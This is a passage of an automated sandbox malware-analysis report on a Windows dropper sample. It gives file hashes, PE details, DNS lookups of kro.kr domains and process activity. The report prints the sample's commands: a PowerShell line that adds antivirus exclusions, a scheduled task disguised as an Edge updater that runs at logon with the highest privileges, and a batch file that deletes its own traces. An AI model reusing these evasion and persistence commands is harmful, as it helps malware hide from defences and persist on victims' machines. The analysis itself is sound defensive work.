                                                                                                                  Preview:@echo off..ping 127.0.0.1 -n 2 > nul..del "C:\ProgramData\Microsoft\Bound.exe"..del "C:\Users\user\AppData\Local\Temp\tmp8B5F.tmp.bat"..

                                                                                                                  C:\Windows\appcompat\Programs\Amcache.hve

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WerFault.exe
                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):1835008
                                                                                                                  Entropy (8bit):4.465741954895257
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6144:gIXfpi67eLPU9skLmb0b4wWSPKaJG8nAgejZMMhA2gX4WABl0uNxdwBCswSbJ:lXD94wWlLZMM6YFHD+J
                                                                                                                  MD5:E8EA90961201254D9210C5FF57368940
                                                                                                                  SHA1:01C4C194F26702097D9CC3825EACA80F3FF81A8F
                                                                                                                  SHA-256:AECA86CCEEC823C2BAF9B8AA1373940CB0E878E5C393AB028A20219549B2812A
                                                                                                                  SHA-512:6FD5C6DFA512BFBFD85C73F1CC16440E22BCB217A4F4A6FA57F98C734987238C8C9F8A6F3952EE57617D2DFA4BCD8786D4570D3351D135C0453EA810216BB2D6
                                                                                                                  Malicious:false
                                                                                                                  Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm"?.o.*..............................................................................................................................................................................................................................................................................................................................................:..[........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  \Device\Null

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\PING.EXE
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):331
                                                                                                                  Entropy (8bit):4.92149009030101
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:6:PzLSLzMRfmWxHLThx2LThx0sW26VY7FwAFeMmvVOIHJFxMVlmJHaVFEG1vv:PKMRJpTeT0sBSAFSkIrxMVlmJHaVzvv
                                                                                                                  MD5:2E512EE24AAB186D09E9A1F9B72A0569
                                                                                                                  SHA1:C5BA2E0C0338FFEE13ED1FB6DA0CC9C000824B0B
                                                                                                                  SHA-256:DB41050CA723A06D95B73FFBE40B32DE941F5EE474F129B2B33E91C67B72674F
                                                                                                                  SHA-512:6B4487A088155E34FE5C642E1C3D46F63CB2DDD9E4092809CE6F3BEEFDEF0D1F8AA67F8E733EDE70B07F467ED5BB6F07104EEA4C1E7AC7E1A502A772F56F7DE9
                                                                                                                  Malicious:false
                                                                                                                  Preview:..Pinging 127.0.0.1 with 32 bytes of data:..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128..Reply from 127.0.0.1: bytes=32 time<1ms TTL=128....Ping statistics for 127.0.0.1:.. Packets: Sent = 2, Received = 2, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Entropy (8bit):7.9999823397845145
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
                                                                                                                  File size:42'137'088 bytes
                                                                                                                  MD5:a9a01bcaf4ffeddb26fd9fc79f0b57c4
                                                                                                                  SHA1:becb33e475352ad604ea851038cec53d2d15b047
                                                                                                                  SHA256:64be2f3a38522ca4b5f4d7887cd5832363f00d1a07b8bb531424bf6e81939fce
                                                                                                                  SHA512:8ade168a430cbcd0375ff6f3a1d774b882d4bc55a03a1dc12839af2d7579dd1a8502e80e7f8a9aeac63321826299076536dfd03a0b2eca7210663235622a3dc9
                                                                                                                  SSDEEP:786432:JmVqrMvDDbtNol33m04zcGnI2bAYs0MNYRNFF8SMEJUG/wwOc4:MVqovbtNol3zC1Nr8S5l/qc
                                                                                                                  TLSH:02973318D63A1C9FDE668D25480DBD73B599B631A35F0543E4C28BB6232CC899A0D4FF
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....,..........."...0......f.......`....... ....@.. ....................................`................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x2c3600a
                                                                                                                  Entrypoint Section:
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows cui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0xCF2C0F01 [Wed Feb 21 19:58:57 2080 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  jmp dword ptr [02C36000h]
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al
                                                                                                                  add byte ptr [eax], al

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x28287f80x53.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x28320000x538.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x28340000xc.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x28360000x8
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x28280000x48.text
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  =0aP0x20000x2825cb80x2825e0026a2ec61302307ff6481c01c06424c3eunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .text0x28280000x89a80x8a002d1d34cd60f236f42aafb7e63348567cFalse0.3990036231884058data4.916342117023775IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x28320000x5380x6001839712fe9d6e72448e9e01f7ecc6441False0.3873697916666667data3.672859168596997IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x28340000xc0x2009e3b6dcddf9d500423643546d679185eFalse0.044921875data0.11836963125913882IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                  0x28360000x100x200b931e68ae35e54247b378396e2d61abbFalse0.048828125data0.1794325416558982IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_VERSION0x28320a00x32cdata0.4211822660098522
                                                                                                                  RT_MANIFEST0x28323cc0x16aXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.6132596685082873

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  mscoree.dll_CorExeMain

                                                                                                                  Network Behavior

                                                                                                                  Network Port Distribution

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Oct 30, 2024 12:25:41.529673100 CET6465653192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:25:42.052875996 CET53646561.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:25:42.054255962 CET5812253192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:25:42.568273067 CET53581221.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:25:52.586582899 CET5183553192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:25:53.128171921 CET53518351.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:25:53.128853083 CET6407453192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:25:53.642534971 CET53640741.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:03.661909103 CET5462553192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:03.926527023 CET53546251.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:03.927485943 CET6440253192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:03.936670065 CET53644021.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:13.943082094 CET5103953192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:14.467447996 CET53510391.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:14.468079090 CET5490553192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:14.734442949 CET53549051.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:24.728436947 CET5090453192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:25.239952087 CET53509041.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:25.357840061 CET5286853192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:25.639683962 CET53528681.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:35.646135092 CET5504953192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:36.215848923 CET53550491.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:36.216552973 CET5742453192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:36.497512102 CET53574241.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:46.505414009 CET5509853192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:47.018918991 CET53550981.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:47.028157949 CET5151053192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:47.551381111 CET53515101.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:57.568346977 CET5735453192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:58.094928026 CET53573541.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:26:58.096508980 CET5232153192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:26:58.605308056 CET53523211.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:27:08.617275000 CET5126353192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:27:09.129204988 CET53512631.1.1.1192.168.2.4
                                                                                                                  Oct 30, 2024 12:27:09.129983902 CET4915353192.168.2.41.1.1.1
                                                                                                                  Oct 30, 2024 12:27:09.898273945 CET53491531.1.1.1192.168.2.4

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Oct 30, 2024 12:25:41.529673100 CET192.168.2.41.1.1.10xb37cStandard query (0)nt89s.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:25:42.054255962 CET192.168.2.41.1.1.10xf146Standard query (0)nt89.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:25:52.586582899 CET192.168.2.41.1.1.10x5f7bStandard query (0)nt89s.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:25:53.128853083 CET192.168.2.41.1.1.10x4a36Standard query (0)nt89.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:03.661909103 CET192.168.2.41.1.1.10xcb06Standard query (0)nt89s.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:03.927485943 CET192.168.2.41.1.1.10xc7fStandard query (0)nt89.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:13.943082094 CET192.168.2.41.1.1.10xc1c2Standard query (0)nt89s.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:14.468079090 CET192.168.2.41.1.1.10x7fe3Standard query (0)nt89.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:24.728436947 CET192.168.2.41.1.1.10xa9d6Standard query (0)nt89s.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:25.357840061 CET192.168.2.41.1.1.10xed50Standard query (0)nt89.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:35.646135092 CET192.168.2.41.1.1.10xc214Standard query (0)nt89s.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:36.216552973 CET192.168.2.41.1.1.10xbaedStandard query (0)nt89.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:46.505414009 CET192.168.2.41.1.1.10xc6d2Standard query (0)nt89s.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:47.028157949 CET192.168.2.41.1.1.10x8c19Standard query (0)nt89.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:57.568346977 CET192.168.2.41.1.1.10x949bStandard query (0)nt89s.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:58.096508980 CET192.168.2.41.1.1.10xb1a6Standard query (0)nt89.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:27:08.617275000 CET192.168.2.41.1.1.10xc0a3Standard query (0)nt89s.kro.krA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:27:09.129983902 CET192.168.2.41.1.1.10xe1fStandard query (0)nt89.kro.krA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Oct 30, 2024 12:25:42.052875996 CET1.1.1.1192.168.2.40xb37cName error (3)nt89s.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:25:42.568273067 CET1.1.1.1192.168.2.40xf146Name error (3)nt89.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:25:53.128171921 CET1.1.1.1192.168.2.40x5f7bName error (3)nt89s.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:25:53.642534971 CET1.1.1.1192.168.2.40x4a36Name error (3)nt89.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:03.926527023 CET1.1.1.1192.168.2.40xcb06Name error (3)nt89s.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:03.936670065 CET1.1.1.1192.168.2.40xc7fName error (3)nt89.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:14.467447996 CET1.1.1.1192.168.2.40xc1c2Name error (3)nt89s.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:14.734442949 CET1.1.1.1192.168.2.40x7fe3Name error (3)nt89.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:25.239952087 CET1.1.1.1192.168.2.40xa9d6Name error (3)nt89s.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:25.639683962 CET1.1.1.1192.168.2.40xed50Name error (3)nt89.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:36.215848923 CET1.1.1.1192.168.2.40xc214Name error (3)nt89s.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:36.497512102 CET1.1.1.1192.168.2.40xbaedName error (3)nt89.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:47.018918991 CET1.1.1.1192.168.2.40xc6d2Name error (3)nt89s.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:47.551381111 CET1.1.1.1192.168.2.40x8c19Name error (3)nt89.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:58.094928026 CET1.1.1.1192.168.2.40x949bName error (3)nt89s.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:26:58.605308056 CET1.1.1.1192.168.2.40xb1a6Name error (3)nt89.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:27:09.129204988 CET1.1.1.1192.168.2.40xc0a3Name error (3)nt89s.kro.krnonenoneA (IP address)IN (0x0001)false
                                                                                                                  Oct 30, 2024 12:27:09.898273945 CET1.1.1.1192.168.2.40xe1fName error (3)nt89.kro.krnonenoneA (IP address)IN (0x0001)false

                                                                                                                  Statistics

                                                                                                                  CPU Usage

                                                                                                                  Click to jump to process

                                                                                                                  Memory Usage

                                                                                                                  Click to jump to process

                                                                                                                  High Level Behavior Distribution

                                                                                                                  Click to dive into process behavior distribution

                                                                                                                  Behavior

                                                                                                                  Click to jump to process

                                                                                                                  System Behavior

                                                                                                                  General

                                                                                                                  Target ID:0
                                                                                                                  Start time:07:25:05
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.24481.7673.exe"
                                                                                                                  Imagebase:0x21c19320000
                                                                                                                  File size:42'137'088 bytes
                                                                                                                  MD5 hash:A9A01BCAF4FFEDDB26FD9FC79F0B57C4
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:low
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:1
                                                                                                                  Start time:07:25:07
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:2
                                                                                                                  Start time:07:25:18
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft';Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Internet Explorer'"
                                                                                                                  Imagebase:0x7ff788560000
                                                                                                                  File size:452'608 bytes
                                                                                                                  MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:3
                                                                                                                  Start time:07:25:18
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:4
                                                                                                                  Start time:07:25:20
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                  Imagebase:0x7ff693ab0000
                                                                                                                  File size:496'640 bytes
                                                                                                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:false
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:8
                                                                                                                  Start time:07:25:29
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"cmd.exe" /c schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f
                                                                                                                  Imagebase:0x7ff7ca4c0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:9
                                                                                                                  Start time:07:25:29
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:10
                                                                                                                  Start time:07:25:29
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:schtasks /delete /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAA-BD9C-FC4F0859F018}" /f
                                                                                                                  Imagebase:0x7ff76f990000
                                                                                                                  File size:235'008 bytes
                                                                                                                  MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:11
                                                                                                                  Start time:07:25:30
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\cmd.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:"cmd.exe" /c schtasks /create /tn "MicrosoftEdgeUpdateTaskMachineCore{53F2EB3B-2C85-ABAB-BD9C-FC4F0859F018}" /tr "\"C:\ProgramData\Microsoft\MicrosoftEdgeUpdate.exe\"" /sc onlogon /rl HIGHEST /f
                                                                                                                  Imagebase:0x7ff7ca4c0000
                                                                                                                  File size:289'792 bytes
                                                                                                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                  Has elevated privileges:true
                                                                                                                  Has administrator privileges:true
                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                  Reputation:high
                                                                                                                  Has exited:true

                                                                                                                  General

                                                                                                                  Target ID:12
                                                                                                                  Start time:07:25:30
                                                                                                                  Start date:30/10/2024
                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                  Wow64 process (32bit):false
                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                  File size:862'208 bytes
                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                  Has elevated privileges:true
